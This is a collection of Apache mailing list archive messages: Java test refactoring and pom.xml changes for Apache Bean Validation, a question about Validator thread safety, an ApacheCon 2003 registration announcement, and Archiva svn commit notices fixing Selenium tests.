errorPath = (PathImpl) error.getOwner(); > + Assert.assertEquals("Incorrect path created", "[0].name[]", > errorPath > + .toString()); > + } > > - // [] > + public void testEmptyIndex() { > > cvb.addNode(null).addNode(null).inIterable().addConstraintViolation(); > - error = cvc.getErrorMessages().iterator().next(); > - errorPath = (PathImpl) error.getOwner(); > - Assert.assertEquals("Incorrect path created", "[]", > errorPath.toString()); > - > - resetConstraintValidatorContext(); > - > + Error error = cvc.getErrorMessages().iterator().next(); > + PathImpl errorPath = (PathImpl) error.getOwner(); > + Assert.assertEquals("Incorrect path created", "[]", errorPath > + .toString()); > + } > + > + public void testRootPath() { > // Adding only nulls should still give a root path > - > cvb.addNode(null).addNode(null).addNode(null).addNode(null).addConstraintViolation(); > - error = cvc.getErrorMessages().iterator().next(); > - errorPath = (PathImpl) error.getOwner(); > - Assert.assertTrue("Created path must be a root path", > errorPath.isRootPath()); > - > - } > - > - // TODO: mock > - public static class DummyContext<T> implements > - GroupValidationContext<T> { > - > - public boolean collectValidated(ConstraintValidator constraint) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public ConstraintValidation getConstraintValidation() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public Group getCurrentGroup() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public Groups getGroups() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public MessageInterpolator getMessageResolver() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public PathImpl getPropertyPath() { > - return PathImpl.createPathFromString(""); > - } > - > - public MetaBean getRootMetaBean() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public TraversableResolver getTraversableResolver() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public Object getValidatedValue() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setConstraintValidation(ConstraintValidation > constraint) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setCurrentGroup(Group group) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setFixedValue(Object value) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public boolean collectValidated() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public AccessStrategy getAccess() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public Object getBean() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public ConstraintValidationListener<T> getListener() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public MetaBean getMetaBean() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public MetaProperty getMetaProperty() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public String getPropertyName() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public Object getPropertyValue() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public Object getPropertyValue(AccessStrategy access) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void moveDown(MetaProperty prop, AccessStrategy access) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void moveUp(Object bean, MetaBean metaBean) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setBean(Object bean) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setBean(Object aBean, MetaBean aMetaBean) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setCurrentIndex(Integer index) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setCurrentKey(Object key) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setMetaBean(MetaBean metaBean) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - public void setMetaProperty(MetaProperty metaProperty) { > - throw new IllegalStateException("Unexpected call"); > - } > - > - // @Override - not allowed in 1.5 for Interface methods > - public Class<?> getCurrentOwner() { > - throw new IllegalStateException("Unexpected call"); > - } > - > - // @Override - not allowed in 1.5 for Interface methods > - public void setCurrentOwner(Class<?> currentOwner) { > - throw new IllegalStateException("Unexpected call"); > - } > + cvb.addNode(null).addNode(null).addNode(null).addNode(null) > + .addConstraintViolation(); > + Error error = cvc.getErrorMessages().iterator().next(); > + PathImpl errorPath = (PathImpl) error.getOwner(); > + Assert.assertTrue("Created path must be a root path", errorPath > + .isRootPath()); > > } > > > Modified: incubator/bval/trunk/pom.xml > URL: > http://svn.apache.org/viewvc/incubator/bval/trunk/pom.xml?rev=980571&r1=980570&r2=980571&view=diff > > ============================================================================== > --- incubator/bval/trunk/pom.xml (original) > +++ incubator/bval/trunk/pom.xml Thu Jul 29 21:04:50 2010 > @@ -322,7 +322,7 @@ > <artifactId>bval-tck-runner</artifactId> > <version>${project.version}</version> > </dependency> > - > + > <!-- Default of Apache Geronimo version of the Spec API --> > <dependency> > <groupId>org.apache.geronimo.specs</groupId> > @@ -347,6 +347,11 @@ > <version>3.8.2</version> > </dependency> > <dependency> > + <groupId>org.mockito</groupId> > + <artifactId>mockito-core</artifactId> > + <version>1.8.5</version> > + </dependency> > + <dependency> > <groupId>commons-lang</groupId> > <artifactId>commons-lang</artifactId> > <version>2.4</version> > @@ -666,7 +671,7 @@ > <module>bval-core</module> > <module>bval-xstream</module> > <module>bval-jsr303</module> > - <module>bundle</module> > + <module>bundle</module> > <module>bval-json</module> > <module>bval-guice</module> > <module>bval-tck</module> > > > --0016e68ee005b81d32048c97416a-- From [email protected] Sat Jul 31 09:37:43 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96099 invoked from network); 31 Jul 2010 09:37:43 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 31 Jul 2010 09:37:43 -0000 Received: (qmail 23451 invoked by uid 500); 31 Jul 2010 09:37:43 -0000 Delivered-To: [email protected] Received: (qmail 23413 invoked by uid 500); 31 Jul 2010 09:37:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23405 invoked by uid 99); 31 Jul 2010 09:37:40 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 31 Jul 2010 09:37:40 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ey0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 31 Jul 2010 09:37:35 +0000 Received: by eyf5 with SMTP id 5so934782eyf.6 for <[email protected]>; Sat, 31 Jul 2010 02:37:14 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=/m0QnjQvg+WARfMylQ5Tp+uYqJ1qqIieM/PL/OdYgIQ=; b=ijKdIJOeSzgSUeThwds0NzNcn8+OMP1Nq29+oAp8iJSNK5VCX4VEMJKdjnbhH/U8r4 kYKimCepGSX9647rZljLrkSW9JNtJASiP3V7LU+IzNEWBl3yShBD94Q+UMJJWuogny9q 56KPTyPFWGzDkFxl5gPv6weXDQAAqz64XkBd8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=Cb3EyLFBeO1J7maW2L1rmQZusbNqiSUdJ+rEvtnKwXfDfLCYN76E6Ov6ZDFveqWIcm s9dkZuUKVN5FkVa3AnwMK5cb0AUf41+hiayBKQ8euTIu4za9/6xHfyxxsCT7QEdSAVD8 hp0ASjTq+LzIqi3YMzq1/QSG74IfDE4SA8oyc= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id k5mr2087656ebc.40.1280569033924; Sat, 31 Jul 2010 02:37:13 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 31 Jul 2010 02:37:13 -0700 (PDT) Date: Sat, 31 Jul 2010 11:37:13 +0200 Message-ID: <[email protected]> Subject: Is our Validation implementation thread-safety? From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Hi guys! taking a look once again at the code, I got in trouble if the Validation implementation os thread-safety... can anyone help me please? The reply would influence some details in the guice module I would like to fix before the 0.2 release, thanks in advance! Simo http://people.apache.org/~simonetripodi/ http://www.99soft.org/ From [email protected] Sat Jul 31 17:24:18 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22065 invoked from network); 31 Jul 2010 17:24:18 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 31 Jul 2010 17:24:18 -0000 Received: (qmail 92417 invoked by uid 500); 31 Jul 2010 17:24:18 -0000 Delivered-To: [email protected] Received: (qmail 92395 invoked by uid 500); 31 Jul 2010 17:24:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92387 invoked by uid 99); 31 Jul 2010 17:24:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 31 Jul 2010 17:24:17 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ey0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 31 Jul 2010 17:24:12 +0000 Received: by eyf5 with SMTP id 5so990456eyf.6 for <[email protected]>; Sat, 31 Jul 2010 10:23:51 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=qrKzfEKrIdvJGU1dpAvyxjwfz/uNldGscsmrEMpnStk=; b=iRdHOytYjSim9j9a3X+tW30HSRUgkaZxxYstjKvvaCme/WvBkRXnP24RS1A+Y3w6Tq OiGpvsLqC186UsxhbQ0si+OciBcV7DtuSrKGXmr+UQt9PA18T4R0cNrVCiAEIqWKaGg0 iDMPYXYkBzU9x19BHwVel5EuvvFJG4XkuxPNk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=UelA3cONSa+1hkSJ3SR2+5mMu+pu90DhmDxwfCT3lVvz+/W+Lqo7SOZ1hndFz6CnD8 Aenpp9b/FvLcWJAfNlWGVMH20qODE0jIXkRdOXLm9IBOUXtVtwA3Qgw+DmhvLD1tqYa4 B7r1mhypLagQrmj2McGTATAjwJS/Yx/IQgxBA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id i15mr2330457ebc.62.1280597031295; Sat, 31 Jul 2010 10:23:51 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 31 Jul 2010 10:23:51 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Sat, 31 Jul 2010 19:23:51 +0200 Message-ID: <[email protected]> Subject: Re: Is our Validation implementation thread-safety? From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Sorry, I meant Validator :P Simo http://people.apache.org/~simonetripodi/ http://www.99soft.org/ On Sat, Jul 31, 2010 at 11:37 AM, Simone Tripodi <[email protected]> wrote: > Hi guys! > taking a look once again at the code, I got in trouble if the > Validation implementation os thread-safety... can anyone help me > please? > The reply would influence some details in the guice module I would > like to fix before the 0.2 release, thanks in advance! > Simo > > http://people.apache.org/~simonetripodi/ > http://www.99soft.org/ >
From [email protected] Thu Nov 15 21:25:28 2001 Return-Path: <[email protected]> Mailing-List: contact [email protected]; run by ezmlm Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 68156 invoked from network); 15 Sep 2003 14:33:25 -0000 Received: from unknown (HELO mail.messagingengine.com) (161.129.204.104) by daedalus.apache.org with SMTP; 15 Sep 2003 14:33:25 -0000 Received: from mail.messagingengine.com (localhost [161.129.204.104]) by localhost.localdomain (Postfix) with ESMTP id 90ABB1D0E4C for <[email protected]>; Mon, 15 Sep 2003 10:33:26 -0400 (EDT) Received: from 161.129.204.104 ([161.129.204.104] helo=mail.messagingengine.com) by messagingengine.com with SMTP; Mon, 15 Sep 2003 10:33:26 -0400 X-Epoch: 1063636406 X-Sasl-enc: mVvv+uGAjQ9urrpr8wT7Cg Received: from usager70-65.hec.ca (usager70-65.hec.ca [161.129.204.104]) by mail.messagingengine.com (Postfix) with ESMTP id D89591D0690 for <[email protected]>; Mon, 15 Sep 2003 10:33:25 -0400 (EDT) Date: Mon, 15 Sep 2003 10:30:52 -0400 (=?ISO-8859-1?Q?Est_=28heure_d'=E9t=E9=29?=) From: Joshua Slive <[email protected]> To: [email protected] Subject: Registration Opens for ApacheCon 2003 Message-ID: <[email protected]> X-X-Sender: [email protected]@mail.messagingengine.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N http://www.marketwire.com/mw/release_html_b1?release_id=57498 Registration Opens for ApacheCon 2003, the Global Hub for All Things Apache (MARKET WIRE) -- 09/15/2003 -- http://www.apachecon.com/ -- ApacheCon, the official conference of the Apache Software Foundation (ASF), announced today the opening of registration for ApacheCon 2003, to be held November 16-20, 2003 in Las Vegas, Nevada. Forward-thinking open source users, developers, programmers, system administrators, and information architects head to ApacheCon to master new technologies, expand their knowledge and share problem-solving skills with peers from across the globe. Offering a wide range of beginner, intermediate and advanced sessions, ApacheCon attendees will learn firsthand the latest developments in Apache, the world's most popular Web server software, as well as key open source projects spanning PHP, Perl, XML, Java, MySQL, WebDAV, and more. Debuting at ApacheCon is code-named Geronimo, the ASF-licensed open source implementation of the J2EE specification that builds upon the many ASF-driven Java projects in liaison with leading members of the Castor, JBoss, MX4J and OpenEJB communities. "We're proud to offer the opportunity to inspire, educate, and interact with some of the industry's sharpest minds," said ApacheCon 2003 Chairman Ken Coar. "ApacheCon attendees are part of a collective voice in providing input and feedback to the Apache Software Foundation, thereby making a direct impact on the Apache community." More than 60 Sessions Highlight Core and Next-Generation Apache Server Tools ApacheCon kicks off with intensive full- and half-day tutorials that offer real world insight, techniques, and methodologies pivotal to the increasing demand for open source software. Attendees hone their skills, learn shortcuts and hacks and solve programming challenges on a variety of topics, including Apache 2.0, Jakarta, PHP, Perl, and SVG. This year's sessions highlight the dynamic nature of open development, and are grouped into three Focus Days: 1) Apache with XML and Java; 2) All Things Apache; and 3) Apache with Perl and PHP. ApacheCon presenters and faculty include some of the most accomplished and respected leaders in the open source community, such as Rich Bowen, Doug Tidwell, Stas Bekman, Rasmus Lerdorf, Greg Stein, Stefano Mazzocchi, and Geoffrey Young, along with keynote speakers Chris Pirillo and Doc Searls. Attendees can meet ASF members and peers during the ApacheCon Expo, evening events, birds of a feather sessions and a number of informal social gatherings. Premier sponsors include the Java Community Process (JCP), and Sun Microsystems who returns as a platinum sponsor. Once again ApacheCon is offering early registration incentives, including a tiered discount of up to $400 off the $899 individual registration fee to those who register by 30 September. The full conference schedule, tutorial descriptions, sponsorship and exhibitor opportunities, and venue details can be found at the ApacheCon 2003 Website. Register today at http://www.apachecon.com/ . Press registration is now available; please contact the ApacheCon Press Team on 2837261571 or via email at [email protected]. About the Apache Software Foundation The Apache Software Foundation provides organizational, legal, and financial support for world-class, Open Source, Java, Perl, XML, Tcl, and PHP projects, in addition to the world's most popular Web server. The membership driven, non-profit, Foundation exists to ensure that the Apache projects continue to exist beyond the contributions of individuals, to enable contributions of intellectual property and financial support, and to provide a vehicle for limiting legal exposure while participating in Open Source projects. For more information, please see http://www.apache.org ------------------------------------------------------ Contact: Sally Khudairi Company: Apache Software Foundation Phone: 2837261571 Email: [email protected]
From [email protected] Wed Feb 03 10:15:00 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49365 invoked from network); 3 Feb 2010 10:15:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Feb 2010 10:15:00 -0000 Received: (qmail 35295 invoked by uid 500); 3 Feb 2010 10:15:00 -0000 Delivered-To: [email protected] Received: (qmail 35227 invoked by uid 500); 3 Feb 2010 10:14:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35218 invoked by uid 99); 3 Feb 2010 10:14:59 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 10:14:59 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 10:14:57 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 03C0F238897F; Wed, 3 Feb 2010 10:14:36 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r905969 - in /archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test: RepositoryTest.java parent/AbstractArchivaTest.java parent/AbstractRepositoryTest.java Date: Wed, 03 Feb 2010 10:14:34 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: oching Date: Wed Feb 3 10:14:31 2010 New Revision: 905969 URL: http://svn.apache.org/viewvc?rev=905969&view=rev Log: fixed failing selenium tests by: o adding check if already in the page before attempting to click the link in nav menu o adding dependency to previous test for adding repository so proper order is executed Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java?rev=905969&r1=905968&r2=905969&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java Wed Feb 3 10:14:31 2010 @@ -36,6 +36,7 @@ assertRepositoriesPage(); } + @Test(dependsOnMethods = { "testAddManagedRepoValidValues" } ) public void testAddManagedRepoInvalidValues() { goToRepositoriesPage(); Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java?rev=905969&r1=905968&r2=905969&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java Wed Feb 3 10:14:31 2010 @@ -503,7 +503,10 @@ public void goToRepositoriesPage() { - clickLinkWithText( "Repositories" ); + if( !getTitle().equals( "Apache Archiva \\ Administration - Repositories" ) ) + { + clickLinkWithText( "Repositories" ); + } assertRepositoriesPage(); } Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java?rev=905969&r1=905968&r2=905969&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java Wed Feb 3 10:14:31 2010 @@ -28,7 +28,10 @@ // Repository Groups public void goToRepositoryGroupsPage() { - clickLinkWithText( "Repository Groups" ); + if( !getTitle().equals( "Apache Archiva \\ Administration - Repository Groups" ) ) + { + clickLinkWithText( "Repository Groups" ); + } assertRepositoryGroupsPage(); } @@ -288,8 +291,8 @@ } public void editManagedRepository( String fieldName, String value ) - { - //goToRepositoriesPage(); + { + goToRepositoriesPage(); clickLinkWithXPath( "//div[@id='contentArea']/div/div[5]/div[1]/a[1]/img" ); assertPage( "Apache Archiva \\ Admin: Edit Managed Repository" ); setFieldValue(fieldName, value); From [email protected] Wed Feb 03 10:21:23 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53624 invoked from network); 3 Feb 2010 10:21:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Feb 2010 10:21:23 -0000 Received: (qmail 43394 invoked by uid 500); 3 Feb 2010 10:21:23 -0000 Delivered-To: [email protected] Received: (qmail 43339 invoked by uid 500); 3 Feb 2010 10:21:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43329 invoked by uid 99); 3 Feb 2010 10:21:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 10:21:23 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 10:21:21 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 079FC238897F; Wed, 3 Feb 2010 10:21:00 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r905971 - in /archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test: RepositoryTest.java parent/AbstractArchivaTest.java parent/AbstractRepositoryTest.java Date: Wed, 03 Feb 2010 10:20:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: oching Date: Wed Feb 3 10:20:55 2010 New Revision: 905971 URL: http://svn.apache.org/viewvc?rev=905971&view=rev Log: merged from trunk -r905969 (fixed failing selenium test) Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java?rev=905971&r1=905970&r2=905971&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java Wed Feb 3 10:20:55 2010 @@ -36,6 +36,7 @@ assertRepositoriesPage(); } + @Test(dependsOnMethods = { "testAddManagedRepoValidValues" } ) public void testAddManagedRepoInvalidValues() { goToRepositoriesPage(); Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java?rev=905971&r1=905970&r2=905971&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java Wed Feb 3 10:20:55 2010 @@ -503,7 +503,10 @@ public void goToRepositoriesPage() { - clickLinkWithText( "Repositories" ); + if( !getTitle().equals( "Apache Archiva \\ Administration - Repositories" ) ) + { + clickLinkWithText( "Repositories" ); + } assertRepositoriesPage(); } Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java?rev=905971&r1=905970&r2=905971&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java Wed Feb 3 10:20:55 2010 @@ -28,7 +28,10 @@ // Repository Groups public void goToRepositoryGroupsPage() { - clickLinkWithText( "Repository Groups" ); + if( !getTitle().equals( "Apache Archiva \\ Administration - Repository Groups" ) ) + { + clickLinkWithText( "Repository Groups" ); + } assertRepositoryGroupsPage(); } @@ -288,8 +291,8 @@ } public void editManagedRepository( String fieldName, String value ) - { - //goToRepositoriesPage(); + { + goToRepositoriesPage(); clickLinkWithXPath( "//div[@id='contentArea']/div/div[5]/div[1]/a[1]/img" ); assertPage( "Apache Archiva \\ Admin: Edit Managed Repository" ); setFieldValue(fieldName, value); From [email protected] Wed Feb 03 11:11:41 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75472 invoked from network); 3 Feb 2010 11:11:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Feb 2010 11:11:41 -0000 Received: (qmail 24696 invoked by uid 500); 3 Feb 2010 11:11:41 -0000 Delivered-To: [email protected] Received: (qmail 24638 invoked by uid 500); 3 Feb 2010 11:11:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24629 invoked by uid 99); 3 Feb 2010 11:11:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 11:11:40 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 11:11:38 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D0E7323889BB; Wed, 3 Feb 2010 11:11:16 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r905996 - in /archiva/trunk/archiva-modules/archiva-web: archiva-webapp-test/src/test/resources/ archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ Date: Wed, 03 Feb 2010 11:11:13 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: oching Date: Wed Feb 3 11:11:06 2010 New Revision: 905996 URL: http://svn.apache.org/viewvc?rev=905996&view=rev Log: [MRM-1316] audit log report does not restrict events to repositories that you are a manager of o filter the results and show only actions performed on repos which the user has access to o added selenium test Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties 